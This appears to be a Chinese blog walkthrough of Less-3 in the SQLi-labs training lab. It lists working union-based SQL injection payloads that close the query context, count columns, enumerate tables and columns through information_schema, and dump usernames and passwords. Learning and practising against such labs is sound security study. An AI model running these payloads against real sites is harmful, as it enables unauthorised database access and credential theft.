Less3
继续第三关的学习
1.根据第一关的记录,我们判断出是什么注入
id=1' and '1'='1
id=1' and '1'='2
返回不同,所以存在字符型的注入
2. 这时候我们再用正常的报错猜解准备会发现,无论我们把数字改成几都是这样显示:
3. 这时候我们直接输入?id=1'
根据回显,我们发现我们输入的1’存到了单引号和括号之间 '1''),所以这个不是单单的一个单引号,我们在注入的时候需要把括号也闭合掉,如下:
?id=1') order by 4
?id=1') order by 3
列名字段数为3
4. 做报错猜解准备:?id=-1') union select 1,2,3 --+
我们看到返回了2,3,说明了页面有两个显示位,在第二列和第三列。
5. 联合查询:?id=-1') union select 1,version(),database() --+
6. 查询表名:union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
7. 查询列名:union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
8. 查询username, password
?id=-1' union select 1,group_concat(username),group_concat(password) from security.users --+
-------------------------------------------------------- 成功 -----------------------------------------------------------
最新文章
- Fiddler初探
- 怎样解决MySQL数据库主从复制延迟的问题---流行网站的解决办法(转载)
- java二维数组简单初步理解
- android核心服务初探
- ORACLE导入导出操作篇
- MySQL 遇到的问题:在服务里找不到自己的 MySQL,以及在命令行窗口中运行服务出现的问题。
- Android的logcat命令详解
- Laravel 中使用 Redis 数据库
- 使用Scanner获取键盘输入
- /dev/null 2>;&;1的意思(可以直接参考shell重定向那篇,/dev/null是空设备)
- note 8 字符串
- pyqt5 -——基本功能(HelloWorld)
- Anaconda+MINGW+theano+keras安装
- SQL语句(floor、ceiling和round以及left和right)
- input type = file 上传图片转为base64
- 指向字符串的指针和char类型的数组
- WIN7隐藏GUEST登录账户
- NYOJ 275 队花的烦恼一
- 看阿里P9架构师如何向你定义架构及架构师
- TPO-11 C2 Work for the biology committee
热门文章
- Qt+Python开发百度图片下载器
- linux中花括弧大括号用法
- k8s标签label
- Django学习day10随堂笔记
- linux命令(用户)
- PHP中的MySQLi扩展学习(二)mysqli类的一些少见的属性方法
- Mixed Content: The page at 'xxx' was loaded over HTTPS, but requested an insecure resource 'xxx'.
- 一朵云、一张网、一体化 ——GRTN 打造最佳流媒体场景实践
- 腾讯云启动jenkins
- 鸿蒙内核源码分析(索引节点篇) | 谁是文件系统最重要的概念 | 百篇博客分析OpenHarmony源码 | v64.01